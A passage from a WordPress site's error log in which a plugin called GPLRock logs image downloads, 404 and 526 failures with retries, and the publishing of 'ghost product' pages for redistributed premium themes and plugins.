Retrying... [05-Apr-2026 17:45:09 UTC] GPLRock: Image download failed for product hoppex-real-estate-and-architect-group-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hoppex--real-estate-and-architect-group-wordpress-theme-21353.webp for product hoppex-real-estate-and-architect-group-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:11 UTC] GPLRock: Image download failed for product hoppex-real-estate-and-architect-group-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:13 UTC] GPLRock: Image download failed for product hoppex-real-estate-and-architect-group-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hoppex--real-estate-and-architect-group-wordpress-theme-21353.webp for product hoppex-real-estate-and-architect-group-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:16 UTC] GPLRock WARNING: Image download failed for product hoppex-real-estate-and-architect-group-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hoppex--real-estate-and-architect-group-wordpress-theme-21353.webp [05-Apr-2026 17:45:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hoppex-real-estate-and-architect-group-wordpress-theme [05-Apr-2026 17:45:16 UTC] GPLRock: Image downloaded successfully for product shoppica-premium-opencart-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08a238f2.webp [05-Apr-2026 17:45:16 UTC] GPLRock: Using pre-downloaded image for product shoppica-premium-opencart-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08a238f2.webp [05-Apr-2026 17:45:16 UTC] GPLRock: Ghost product published with image - Product ID: shoppica-premium-opencart-theme [05-Apr-2026 17:45:16 UTC] GPLRock: Image downloaded successfully for product fashi-wp-multipurpose-fashion-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab6c3b08.webp [05-Apr-2026 17:45:16 UTC] GPLRock: Using pre-downloaded image for product fashi-wp-multipurpose-fashion-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab6c3b08.webp [05-Apr-2026 17:45:16 UTC] GPLRock: Ghost product published with image - Product ID: fashi-wp-multipurpose-fashion-woocommerce-wordpress-theme [05-Apr-2026 17:45:16 UTC] GPLRock: Image download failed for product techon-technology-it-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:18 UTC] GPLRock: Image download failed for product techon-technology-it-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techon---technology-it-services-wordpress-theme-26130.webp for product techon-technology-it-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:20 UTC] GPLRock: Image download failed for product techon-technology-it-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:22 UTC] GPLRock: Image download failed for product techon-technology-it-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techon---technology-it-services-wordpress-theme-26130.webp for product techon-technology-it-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:25 UTC] GPLRock WARNING: Image download failed for product techon-technology-it-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/techon---technology-it-services-wordpress-theme-26130.webp [05-Apr-2026 17:45:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: techon-technology-it-services-wordpress-theme [05-Apr-2026 17:45:25 UTC] GPLRock: Image download failed for product electman-electricity-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:27 UTC] GPLRock: Image download failed for product electman-electricity-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/electman---electricity-services-wordpress-theme-15104.webp for product electman-electricity-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:29 UTC] GPLRock: Image download failed for product electman-electricity-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:31 UTC] GPLRock: Image download failed for product electman-electricity-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/electman---electricity-services-wordpress-theme-15104.webp for product electman-electricity-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:33 UTC] GPLRock WARNING: Image download failed for product electman-electricity-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/electman---electricity-services-wordpress-theme-15104.webp [05-Apr-2026 17:45:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: electman-electricity-services-wordpress-theme [05-Apr-2026 17:45:33 UTC] GPLRock: Image download failed for product shang-hair-salon-barber-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:36 UTC] GPLRock: Image download failed for product shang-hair-salon-barber-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shang---hair-salon--barber-shop-wordpress-theme-33669.webp for product shang-hair-salon-barber-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:38 UTC] GPLRock: Image download failed for product shang-hair-salon-barber-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:40 UTC] GPLRock: Image download failed for product shang-hair-salon-barber-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shang---hair-salon--barber-shop-wordpress-theme-33669.webp for product shang-hair-salon-barber-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:42 UTC] GPLRock WARNING: Image download failed for product shang-hair-salon-barber-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/shang---hair-salon--barber-shop-wordpress-theme-33669.webp [05-Apr-2026 17:45:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shang-hair-salon-barber-shop-wordpress-theme [05-Apr-2026 17:45:42 UTC] GPLRock: Image download failed for product webly-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:44 UTC] GPLRock: Image download failed for product webly-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webly---wordpress-blog-theme-24393.webp for product webly-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:46 UTC] GPLRock: Image download failed for product webly-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:49 UTC] GPLRock: Image download failed for product webly-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:45:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webly---wordpress-blog-theme-24393.webp for product webly-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:45:51 UTC] GPLRock WARNING: Image download failed for product webly-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/webly---wordpress-blog-theme-24393.webp [05-Apr-2026 17:45:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: webly-wordpress-blog-theme [05-Apr-2026 17:46:28 UTC] GPLRock: Image downloaded successfully for product tocool-digital-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab36fc99.jpg [05-Apr-2026 17:46:28 UTC] GPLRock: Using pre-downloaded image for product tocool-digital-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab36fc99.jpg [05-Apr-2026 17:46:28 UTC] GPLRock: Ghost product published with image - Product ID: tocool-digital-marketing-agency-elementor-template-kit [05-Apr-2026 17:46:29 UTC] GPLRock: Image downloaded successfully for product tolkio-ai-virtual-assistance-app-elementor-template-kit-2 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b19893f.jpg [05-Apr-2026 17:46:30 UTC] GPLRock: Using pre-downloaded image for product tolkio-ai-virtual-assistance-app-elementor-template-kit-2: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b19893f.jpg [05-Apr-2026 17:46:30 UTC] GPLRock: Ghost product published with image - Product ID: tolkio-ai-virtual-assistance-app-elementor-template-kit-2 [05-Apr-2026 17:46:31 UTC] GPLRock: Image downloaded successfully for product trustnetic-cyber-security-services-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cec3c18f.jpg [05-Apr-2026 17:46:31 UTC] GPLRock: Using pre-downloaded image for product trustnetic-cyber-security-services-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cec3c18f.jpg [05-Apr-2026 17:46:31 UTC] GPLRock: Ghost product published with image - Product ID: trustnetic-cyber-security-services-elementor-pro-template-kit [05-Apr-2026 17:46:33 UTC] GPLRock: Image downloaded successfully for product veloria-hotel-resort-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-492f0cea.jpg [05-Apr-2026 17:46:33 UTC] GPLRock: Using pre-downloaded image for product veloria-hotel-resort-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-492f0cea.jpg [05-Apr-2026 17:46:33 UTC] GPLRock: Ghost product published with image - Product ID: veloria-hotel-resort-elementor-pro-template-kit [05-Apr-2026 17:46:35 UTC] GPLRock: Image downloaded successfully for product vevent-event-planner-organizer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-45c80cab.jpg [05-Apr-2026 17:46:35 UTC] GPLRock: Using pre-downloaded image for product vevent-event-planner-organizer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-45c80cab.jpg [05-Apr-2026 17:46:35 UTC] GPLRock: Ghost product published with image - Product ID: vevent-event-planner-organizer-elementor-template-kit [05-Apr-2026 17:46:38 UTC] GPLRock: Image downloaded successfully for product vibecast-podcast-studio-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6b8b3c9.png [05-Apr-2026 17:46:38 UTC] GPLRock: Using pre-downloaded image for product vibecast-podcast-studio-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6b8b3c9.png [05-Apr-2026 17:46:38 UTC] GPLRock: Ghost product published with image - Product ID: vibecast-podcast-studio-elementor-pro-template-kit [05-Apr-2026 17:46:39 UTC] GPLRock: Image downloaded successfully for product serenity-wedding-organizer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6057f197.jpg [05-Apr-2026 17:46:39 UTC] GPLRock: Using pre-downloaded image for product serenity-wedding-organizer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6057f197.jpg [05-Apr-2026 17:46:39 UTC] GPLRock: Ghost product published with image - Product ID: serenity-wedding-organizer-elementor-template-kit [05-Apr-2026 17:46:41 UTC] GPLRock: Image downloaded successfully for product sunara-solar-renewable-energy-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b2f3a2f5.jpg [05-Apr-2026 17:46:41 UTC] GPLRock: Using pre-downloaded image for product sunara-solar-renewable-energy-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b2f3a2f5.jpg [05-Apr-2026 17:46:41 UTC] GPLRock: Ghost product published with image - Product ID: sunara-solar-renewable-energy-elementor-pro-template-kit [05-Apr-2026 17:46:43 UTC] GPLRock: Image downloaded successfully for product sitewarden-web-hosting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66023bf4.jpg [05-Apr-2026 17:46:43 UTC] GPLRock: Using pre-downloaded image for product sitewarden-web-hosting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66023bf4.jpg [05-Apr-2026 17:46:43 UTC] GPLRock: Ghost product published with image - Product ID: sitewarden-web-hosting-elementor-template-kit [05-Apr-2026 17:46:45 UTC] GPLRock: Image downloaded successfully for product smarto-smart-home-solutions-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8b50590c.jpg [05-Apr-2026 17:46:45 UTC] GPLRock: Using pre-downloaded image for product smarto-smart-home-solutions-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8b50590c.jpg [05-Apr-2026 17:46:46 UTC] GPLRock: Ghost product published with image - Product ID: smarto-smart-home-solutions-elementor-pro-template-kit [05-Apr-2026 17:48:14 UTC] GPLRock: Image downloaded successfully for product woostify-pro-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c86d937d.jpg [05-Apr-2026 17:48:15 UTC] GPLRock: Using pre-downloaded image for product woostify-pro-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c86d937d.jpg [05-Apr-2026 17:48:15 UTC] GPLRock: Ghost product published with image - Product ID: woostify-pro-woocommerce-theme [05-Apr-2026 17:48:16 UTC] GPLRock: Image downloaded successfully for product local-delivery-drivers-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-067287ce.png [05-Apr-2026 17:48:16 UTC] GPLRock: Using pre-downloaded image for product local-delivery-drivers-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-067287ce.png [05-Apr-2026 17:48:16 UTC] GPLRock: Ghost product published with image - Product ID: local-delivery-drivers-for-woocommerce-premium [05-Apr-2026 17:48:18 UTC] GPLRock: Image downloaded successfully for product jnews-wordpress-newspaper-magazine-blog-amp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b61c43c.jpg [05-Apr-2026 17:48:18 UTC] GPLRock: Using pre-downloaded image for product jnews-wordpress-newspaper-magazine-blog-amp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b61c43c.jpg [05-Apr-2026 17:48:18 UTC] GPLRock: Ghost product published with image - Product ID: jnews-wordpress-newspaper-magazine-blog-amp-theme [05-Apr-2026 17:48:20 UTC] GPLRock: Image downloaded successfully for product electro-electronics-store-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f17f6ff.avif [05-Apr-2026 17:48:20 UTC] GPLRock: Using pre-downloaded image for product electro-electronics-store-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f17f6ff.avif [05-Apr-2026 17:48:20 UTC] GPLRock: Ghost product published with image - Product ID: electro-electronics-store-woocommerce-theme [05-Apr-2026 17:48:23 UTC] GPLRock: Image download failed for product houzez-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:48:27 UTC] GPLRock: Image download failed for product houzez-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:48:31 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Houzez-Real-Estate-WordPress-Theme.jpg for product houzez-real-estate-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 17:48:33 UTC] GPLRock: Image download failed for product houzez-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:48:37 UTC] GPLRock: Image download failed for product houzez-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:48:41 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Houzez-Real-Estate-WordPress-Theme.jpg for product houzez-real-estate-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 17:48:41 UTC] GPLRock WARNING: Image download failed for product houzez-real-estate-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Houzez-Real-Estate-WordPress-Theme.jpg [05-Apr-2026 17:48:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: houzez-real-estate-wordpress-theme [05-Apr-2026 17:48:43 UTC] GPLRock: Image downloaded successfully for product indeed-ultimate-affiliate-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31982abe.jpg [05-Apr-2026 17:48:43 UTC] GPLRock: Using pre-downloaded image for product indeed-ultimate-affiliate-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31982abe.jpg [05-Apr-2026 17:48:43 UTC] GPLRock: Ghost product published with image - Product ID: indeed-ultimate-affiliate-pro [05-Apr-2026 17:48:46 UTC] GPLRock: Image download failed for product astra-premium-sites-plugin-agency-demos (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:48:50 UTC] GPLRock: Image download failed for product astra-premium-sites-plugin-agency-demos (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:48:54 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Astra-Premium-Sites-Plugin.jpg for product astra-premium-sites-plugin-agency-demos after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 17:48:56 UTC] GPLRock: Image download failed for product astra-premium-sites-plugin-agency-demos (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:49:00 UTC] GPLRock: Image download failed for product astra-premium-sites-plugin-agency-demos (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:49:04 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Astra-Premium-Sites-Plugin.jpg for product astra-premium-sites-plugin-agency-demos after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 17:49:04 UTC] GPLRock WARNING: Image download failed for product astra-premium-sites-plugin-agency-demos. URL: https://www.gplrock.com/wp-content/uploads/2020/08/Astra-Premium-Sites-Plugin.jpg [05-Apr-2026 17:49:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: astra-premium-sites-plugin-agency-demos [05-Apr-2026 17:49:06 UTC] GPLRock: Image downloaded successfully for product woozone-woocommerce-amazon-affiliates (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51c5f729.png [05-Apr-2026 17:49:06 UTC] GPLRock: Using pre-downloaded image for product woozone-woocommerce-amazon-affiliates: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51c5f729.png [05-Apr-2026 17:49:06 UTC] GPLRock: Ghost product published with image - Product ID: woozone-woocommerce-amazon-affiliates [05-Apr-2026 17:49:08 UTC] GPLRock: Image downloaded successfully for product woodmart-responsive-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4dc63fa2.avif [05-Apr-2026 17:49:08 UTC] GPLRock: Using pre-downloaded image for product woodmart-responsive-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4dc63fa2.avif [05-Apr-2026 17:49:08 UTC] GPLRock: Ghost product published with image - Product ID: woodmart-responsive-woocommerce-wordpress-theme [05-Apr-2026 17:49:11 UTC] GPLRock: Image download failed for product yoast-seo-premium (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:49:15 UTC] GPLRock: Image download failed for product yoast-seo-premium (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:49:19 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/WordPress-SEO-Premium-Plugin.jpg for product yoast-seo-premium after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 17:49:21 UTC] GPLRock: Image download failed for product yoast-seo-premium (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:49:25 UTC] GPLRock: Image download failed for product yoast-seo-premium (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 17:49:29 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/WordPress-SEO-Premium-Plugin.jpg for product yoast-seo-premium after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 17:49:29 UTC] GPLRock WARNING: Image download failed for product yoast-seo-premium. URL: https://www.gplrock.com/wp-content/uploads/2020/07/WordPress-SEO-Premium-Plugin.jpg [05-Apr-2026 17:49:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yoast-seo-premium [05-Apr-2026 17:49:51 UTC] GPLRock: Image download failed for product tplayer-audio-player-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:49:53 UTC] GPLRock: Image download failed for product tplayer-audio-player-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:49:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tplayer---audio-player-for-wordpress-24479.webp for product tplayer-audio-player-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:49:56 UTC] GPLRock: Image download failed for product tplayer-audio-player-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:49:58 UTC] GPLRock: Image download failed for product tplayer-audio-player-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tplayer---audio-player-for-wordpress-24479.webp for product tplayer-audio-player-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:00 UTC] GPLRock WARNING: Image download failed for product tplayer-audio-player-for-wordpress. URL: https://meldwp.com/wp-content/uploads/tplayer---audio-player-for-wordpress-24479.webp [05-Apr-2026 17:50:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tplayer-audio-player-for-wordpress [05-Apr-2026 17:50:00 UTC] GPLRock: Image download failed for product social-page-feed-box-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:02 UTC] GPLRock: Image download failed for product social-page-feed-box-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-page-feed-box-wordpress-plugin-17648.webp for product social-page-feed-box-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:04 UTC] GPLRock: Image download failed for product social-page-feed-box-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:06 UTC] GPLRock: Image download failed for product social-page-feed-box-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-page-feed-box-wordpress-plugin-17648.webp for product social-page-feed-box-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:09 UTC] GPLRock WARNING: Image download failed for product social-page-feed-box-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/social-page-feed-box-wordpress-plugin-17648.webp [05-Apr-2026 17:50:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-page-feed-box-wordpress-plugin [05-Apr-2026 17:50:09 UTC] GPLRock: Image download failed for product quick-order-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:11 UTC] GPLRock: Image download failed for product quick-order-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-order-plugin-for-woocommerce-288.webp for product quick-order-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:13 UTC] GPLRock: Image download failed for product quick-order-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:15 UTC] GPLRock: Image download failed for product quick-order-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-order-plugin-for-woocommerce-288.webp for product quick-order-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:17 UTC] GPLRock WARNING: Image download failed for product quick-order-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/quick-order-plugin-for-woocommerce-288.webp [05-Apr-2026 17:50:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quick-order-plugin-for-woocommerce [05-Apr-2026 17:50:18 UTC] GPLRock: Image download failed for product angustore-responsive-shopping-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:20 UTC] GPLRock: Image download failed for product angustore-responsive-shopping-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/angustore---responsive-shopping-cart-28765.webp for product angustore-responsive-shopping-cart after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:22 UTC] GPLRock: Image download failed for product angustore-responsive-shopping-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:24 UTC] GPLRock: Image download failed for product angustore-responsive-shopping-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/angustore---responsive-shopping-cart-28765.webp for product angustore-responsive-shopping-cart after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:26 UTC] GPLRock WARNING: Image download failed for product angustore-responsive-shopping-cart. URL: https://meldwp.com/wp-content/uploads/angustore---responsive-shopping-cart-28765.webp [05-Apr-2026 17:50:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: angustore-responsive-shopping-cart [05-Apr-2026 17:50:26 UTC] GPLRock: Image download failed for product video-events-listener-green-popups-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:28 UTC] GPLRock: Image download failed for product video-events-listener-green-popups-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-events-listener---green-popups-add-on-11897.webp for product video-events-listener-green-popups-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:31 UTC] GPLRock: Image download failed for product video-events-listener-green-popups-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:33 UTC] GPLRock: Image download failed for product video-events-listener-green-popups-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-events-listener---green-popups-add-on-11897.webp for product video-events-listener-green-popups-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:35 UTC] GPLRock WARNING: Image download failed for product video-events-listener-green-popups-add-on. URL: https://meldwp.com/wp-content/uploads/video-events-listener---green-popups-add-on-11897.webp [05-Apr-2026 17:50:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: video-events-listener-green-popups-add-on [05-Apr-2026 17:50:35 UTC] GPLRock: Image download failed for product boat-yacht-charter-booking-system-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:37 UTC] GPLRock: Image download failed for product boat-yacht-charter-booking-system-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:39 UTC] GPLRock Error: Failed to download image from 